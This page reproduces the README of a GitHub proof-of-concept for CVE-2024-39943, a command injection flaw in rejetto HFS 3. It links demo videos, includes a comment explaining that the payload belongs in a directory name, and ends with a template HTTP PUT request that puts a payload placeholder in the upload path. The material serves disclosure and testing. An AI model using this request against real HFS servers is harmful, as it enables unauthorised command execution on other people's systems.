CVE-2024-39943 PoC — rejetto HFS security vulnerability

Source
Associated Vulnerability
Title: rejetto HFS security vulnerability (CVE-2024-39943)
Description: rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).
Readme
# CVE-2024-39943-Poc
CVE-2024-39943 rejetto HFS (aka HTTP File Server) 3 before 0.52.10 on Linux, UNIX, and macOS allows OS command execution by remote authenticated users (if they have Upload permissions). This occurs because a shell is used to execute df (i.e., with execSync instead of spawnSync in child_process in Node.js).

Deploy:
```
./hfs --config config.yaml
```


## Poc: user admin
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/c9e3d7ec-9181-43b5-8230-82c36fbf8a2b

## Poc: user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/cbb55ece-2c68-4ade-a09d-8b9bf3b961d8

## update 6/7/2024: Poc user guest
https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/f5e0c190-419a-4017-83ab-8a303b7176a8

<!--Note:
The payload is the name of an existing directory. If the directory does not exist, you need to send the request twice. In the video, because a directory whose name contains the payload already exists on the HFS server, I only need to send the request once.

https://github.com/truonghuuphuc/CVE-2024-39943-Poc/assets/20487674/8bc8c270-24a5-4ad6-b32b-a75243afcd6a
-->
```
PUT /tmp/{{payload}}/poc11.txt HTTP/1.1
Host: <host>
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36
Connection: close
Cookie: {{Cookie}}
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 11

aaaaaaaaaaa
```